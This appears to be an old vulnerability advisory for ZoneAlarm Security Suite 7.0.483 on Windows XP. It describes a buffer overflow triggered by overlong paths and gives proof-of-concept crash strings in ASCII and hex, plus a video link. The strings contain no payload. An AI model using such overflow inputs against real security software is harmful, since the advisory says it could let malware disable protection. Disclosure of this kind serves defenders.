|
Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description
The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.
=09
Details of the version
ZoneAlarm Security Suite versi=F3n:7.0.483.000
Versi=F3n de TrueVector:7.0.483.000
Versi=F3n del controlador:7.0.483.000
Versi=F3n de motor anti-virus:3
Versi=F3n de motor antivirus:5.0.1.85
Versi=F3n de archivo DAT de firma de anti-virus 915051681
Versi=F3n de motor de protecci=F3n contra programas esp=EDa:5.0.189.0
Versi=F3n de archivo DAT de firma de protecci=F3n contra programas esp=EDa 01.200801.3195
Versi=F3n de AntiSpam 5.0.6.8903
------------------------------------------------------
Vulnerability
The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.
The flaw could be exploited by malware to leave without protection to the system for instance.
=09
------------------------------------------------------
POC/EXPLOIT
=09
Here you can view a video proof of concept
http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf
Strings
ASCII: =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =B7 =85 A =B7 =85 AAAAAAAAAAAAAAAAAAA =B7 =85 AAAAAAAAAAAAAAAAAAA
HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
ASCII: =85=85=85=85=85=85=85=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=85=85=85=85AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
------------------------------------------------------
Juan Pablo Lopez Yacubian